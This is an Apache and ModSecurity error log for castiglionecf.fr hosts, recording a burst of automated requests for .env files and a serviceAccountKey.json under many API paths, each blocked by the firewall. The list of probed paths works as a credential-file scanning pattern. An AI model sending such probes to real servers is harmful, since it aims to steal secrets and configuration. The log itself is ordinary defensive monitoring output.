[Mon May 11 16:26:06.465081 2026] [security2:error] [pid 1416109:tid 1416153] [client 18.180.54.2:58004] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/v3/.env"] [unique_id "agHm_lV4kyjgo4bQBUhUJwAAANc"]
[Mon May 11 16:26:06.465571 2026] [core:error] [pid 1416109:tid 1416153] [client 18.180.54.2:58004] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:06.465723 2026] [security2:error] [pid 1416109:tid 1416153] [client 18.180.54.2:58004] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/v3/.env"] [unique_id "agHm_lV4kyjgo4bQBUhUJwAAANc"]
[Mon May 11 16:26:06.948500 2026] [security2:error] [pid 1411201:tid 1411261] [client 18.180.54.2:58006] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/v2/.env"] [unique_id "agHm_vy_GXSWIKeli0vyMgAAAI8"]
[Mon May 11 16:26:06.948731 2026] [security2:error] [pid 1411201:tid 1411261] [client 18.180.54.2:58006] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/v2/.env"] [unique_id "agHm_vy_GXSWIKeli0vyMgAAAI8"]
[Mon May 11 16:26:06.949249 2026] [core:error] [pid 1411201:tid 1411261] [client 18.180.54.2:58006] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:06.949407 2026] [security2:error] [pid 1411201:tid 1411261] [client 18.180.54.2:58006] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/v2/.env"] [unique_id "agHm_vy_GXSWIKeli0vyMgAAAI8"]
[Mon May 11 16:26:07.187603 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.180.54.2:58008] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/api/v1/.env"] [unique_id "agHm_1V4kyjgo4bQBUhUKAAAANM"]
[Mon May 11 16:26:07.187818 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.180.54.2:58008] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/api/v1/.env"] [unique_id "agHm_1V4kyjgo4bQBUhUKAAAANM"]
[Mon May 11 16:26:07.188307 2026] [core:error] [pid 1416109:tid 1416149] [client 18.180.54.2:58008] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:07.188462 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.180.54.2:58008] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/api/v1/.env"] [unique_id "agHm_1V4kyjgo4bQBUhUKAAAANM"]
[Mon May 11 16:26:07.628876 2026] [security2:error] [pid 1411055:tid 1411075] [client 18.180.54.2:58018] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/v3/.env"] [unique_id "agHm_0WKUxpmnkK7zHx72QAAARI"]
[Mon May 11 16:26:07.629118 2026] [security2:error] [pid 1411055:tid 1411075] [client 18.180.54.2:58018] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/v3/.env"] [unique_id "agHm_0WKUxpmnkK7zHx72QAAARI"]
[Mon May 11 16:26:07.629667 2026] [core:error] [pid 1411055:tid 1411075] [client 18.180.54.2:58018] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:07.629849 2026] [security2:error] [pid 1411055:tid 1411075] [client 18.180.54.2:58018] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/v3/.env"] [unique_id "agHm_0WKUxpmnkK7zHx72QAAARI"]
[Mon May 11 16:26:07.888858 2026] [security2:error] [pid 1412074:tid 1412077] [client 18.180.54.2:58022] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/api/v2/.env"] [unique_id "agHm_zJnyuKVXoStDha0jQAAAEE"]
[Mon May 11 16:26:07.889086 2026] [security2:error] [pid 1412074:tid 1412077] [client 18.180.54.2:58022] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/api/v2/.env"] [unique_id "agHm_zJnyuKVXoStDha0jQAAAEE"]
[Mon May 11 16:26:07.889610 2026] [core:error] [pid 1412074:tid 1412077] [client 18.180.54.2:58022] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:07.889773 2026] [security2:error] [pid 1412074:tid 1412077] [client 18.180.54.2:58022] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/api/v2/.env"] [unique_id "agHm_zJnyuKVXoStDha0jQAAAEE"]
[Mon May 11 16:26:07.970692 2026] [proxy_http:error] [pid 1411055:tid 1411071] (20014)Internal error (specific information not available): [client 142.248.80.47:43304] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 16:26:07.970718 2026] [proxy:error] [pid 1411055:tid 1411071] [client 142.248.80.47:43304] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/serviceAccountKey.json
[Mon May 11 16:26:07.972042 2026] [proxy_http:error] [pid 1412074:tid 1412084] (20014)Internal error (specific information not available): [client 142.248.80.47:43274] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 16:26:07.972064 2026] [proxy:error] [pid 1412074:tid 1412084] [client 142.248.80.47:43274] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/api/.env
[Mon May 11 16:26:07.972479 2026] [proxy_http:error] [pid 1416109:tid 1416133] (20014)Internal error (specific information not available): [client 142.248.80.47:43284] AH01102: error reading status line from remote server 127.0.0.1:2082
[Mon May 11 16:26:07.972503 2026] [proxy:error] [pid 1416109:tid 1416133] [client 142.248.80.47:43284] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/backend/.env
[Mon May 11 16:26:08.309862 2026] [security2:error] [pid 1411099:tid 1411124] [client 18.180.54.2:58032] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/api/v1/.env"] [unique_id "agHnAA-Qm4vhlWBPlMi59QAAABg"]
[Mon May 11 16:26:08.310092 2026] [security2:error] [pid 1411099:tid 1411124] [client 18.180.54.2:58032] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/api/v1/.env"] [unique_id "agHnAA-Qm4vhlWBPlMi59QAAABg"]
[Mon May 11 16:26:08.310628 2026] [core:error] [pid 1411099:tid 1411124] [client 18.180.54.2:58032] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:08.311170 2026] [security2:error] [pid 1411099:tid 1411124] [client 18.180.54.2:58032] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/api/v1/.env"] [unique_id "agHnAA-Qm4vhlWBPlMi59QAAABg"]
[Mon May 11 16:26:08.568828 2026] [security2:error] [pid 1416109:tid 1416151] [client 18.180.54.2:60650] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/rest/.env"] [unique_id "agHnAFV4kyjgo4bQBUhUKwAAANU"]
[Mon May 11 16:26:08.569010 2026] [security2:error] [pid 1416109:tid 1416151] [client 18.180.54.2:60650] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/rest/.env"] [unique_id "agHnAFV4kyjgo4bQBUhUKwAAANU"]
[Mon May 11 16:26:08.569538 2026] [core:error] [pid 1416109:tid 1416151] [client 18.180.54.2:60650] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:08.569714 2026] [security2:error] [pid 1416109:tid 1416151] [client 18.180.54.2:60650] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/rest/.env"] [unique_id "agHnAFV4kyjgo4bQBUhUKwAAANU"]
[Mon May 11 16:26:08.990298 2026] [security2:error] [pid 1412074:tid 1412098] [client 18.180.54.2:60666] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/api/v2/.env"] [unique_id "agHnADJnyuKVXoStDha0kgAAAFY"]
[Mon May 11 16:26:08.990515 2026] [security2:error] [pid 1412074:tid 1412098] [client 18.180.54.2:60666] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/api/v2/.env"] [unique_id "agHnADJnyuKVXoStDha0kgAAAFY"]
[Mon May 11 16:26:08.991003 2026] [core:error] [pid 1412074:tid 1412098] [client 18.180.54.2:60666] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:08.991186 2026] [security2:error] [pid 1412074:tid 1412098] [client 18.180.54.2:60666] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/api/v2/.env"] [unique_id "agHnADJnyuKVXoStDha0kgAAAFY"]
[Mon May 11 16:26:09.289954 2026] [security2:error] [pid 1411201:tid 1411257] [client 18.180.54.2:60680] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /graphql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/graphql/.env"] [unique_id "agHnAfy_GXSWIKeli0vyOQAAAIs"]
[Mon May 11 16:26:09.290223 2026] [security2:error] [pid 1411201:tid 1411257] [client 18.180.54.2:60680] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/graphql/.env"] [unique_id "agHnAfy_GXSWIKeli0vyOQAAAIs"]
[Mon May 11 16:26:09.290745 2026] [core:error] [pid 1411201:tid 1411257] [client 18.180.54.2:60680] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:09.292242 2026] [security2:error] [pid 1411201:tid 1411257] [client 18.180.54.2:60680] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/graphql/.env"] [unique_id "agHnAfy_GXSWIKeli0vyOQAAAIs"]
[Mon May 11 16:26:09.688111 2026] [security2:error] [pid 1412074:tid 1412083] [client 18.180.54.2:60696] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/rest/.env"] [unique_id "agHnATJnyuKVXoStDha0kwAAAEc"]
[Mon May 11 16:26:09.688361 2026] [security2:error] [pid 1412074:tid 1412083] [client 18.180.54.2:60696] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/rest/.env"] [unique_id "agHnATJnyuKVXoStDha0kwAAAEc"]
[Mon May 11 16:26:09.688849 2026] [core:error] [pid 1412074:tid 1412083] [client 18.180.54.2:60696] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:09.689019 2026] [security2:error] [pid 1412074:tid 1412083] [client 18.180.54.2:60696] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/rest/.env"] [unique_id "agHnATJnyuKVXoStDha0kwAAAEc"]
[Mon May 11 16:26:10.025878 2026] [security2:error] [pid 1416109:tid 1416143] [client 18.180.54.2:60702] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gateway/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/gateway/.env"] [unique_id "agHnAlV4kyjgo4bQBUhUMAAAAM0"]
[Mon May 11 16:26:10.026109 2026] [security2:error] [pid 1416109:tid 1416143] [client 18.180.54.2:60702] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/gateway/.env"] [unique_id "agHnAlV4kyjgo4bQBUhUMAAAAM0"]
[Mon May 11 16:26:10.026628 2026] [core:error] [pid 1416109:tid 1416143] [client 18.180.54.2:60702] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:10.026796 2026] [security2:error] [pid 1416109:tid 1416143] [client 18.180.54.2:60702] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/gateway/.env"] [unique_id "agHnAlV4kyjgo4bQBUhUMAAAAM0"]
[Mon May 11 16:26:10.414365 2026] [security2:error] [pid 1411099:tid 1411104] [client 18.180.54.2:60716] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /graphql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/graphql/.env"] [unique_id "agHnAg-Qm4vhlWBPlMi5-gAAAAM"]
[Mon May 11 16:26:10.414608 2026] [security2:error] [pid 1411099:tid 1411104] [client 18.180.54.2:60716] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/graphql/.env"] [unique_id "agHnAg-Qm4vhlWBPlMi5-gAAAAM"]
